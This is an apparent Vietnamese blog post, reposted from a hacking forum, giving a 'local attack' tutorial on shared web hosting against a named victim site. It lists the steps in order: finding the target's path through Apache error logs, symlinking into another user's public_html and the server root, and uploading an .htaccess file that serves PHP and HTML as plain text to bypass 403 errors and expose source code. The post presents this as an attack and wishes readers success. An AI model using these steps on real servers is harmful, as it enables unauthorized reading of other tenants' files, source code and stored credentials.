Symlink ByPass 403 Forbidden

25 thg 9, 2013

Chào các bạn, lâu lâu rãnh rỗi có ghé qua Xgr0up thấy có cái TUT cơ bản về Local Attack nên mạn phép kéo về đây cho bạn nào đam mê Security & Hacking tham khảo thêm.

Đầu tiên là phần Reverse IP để tìm kiếm mục tiêu tấn công

//////////////////////////REVERSE IP/////////////////////////


///////////////////////MY VICTIM/////////////////////////////

http://www.vnnation.com/

Sau khi đã xác định được mục tiêu cần tấn công, tiếp đến ta tìm Path thông qua Error LOG
//////////////////////GET PATH BY ERROR LOG ////////////////////

tail -n 1000 /usr/local/apache/logs/error_log|grep 123456789

path is : /home/vnnation/public_html/

/////////////////////////SYM LINK THE TARGET ///////////////////

ln -s /home/vnnation/public_html/index.htm index.txt - 403 forbidden

////////////// NOW BYPASS 403 forbidden /////////////////////////
1. symlink / folder

ln -s / r00t

2.upload .htaccess file

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

Ở trên là phần mô tả tóm tắt các công đoạn thực hiện !

Các bạn có thể theo dõi chi tiết Video sau đây:

Lưu ý: Mỗi Server có cách bảo mật khác nhau và mỗi website victim cũng bảo mật khác nhau, muôn người muôn vẽ nên tùy từng tình huống cụ thể mà áp dụng linh hoạt nhé !
Chúc các bạn thành công

FB comment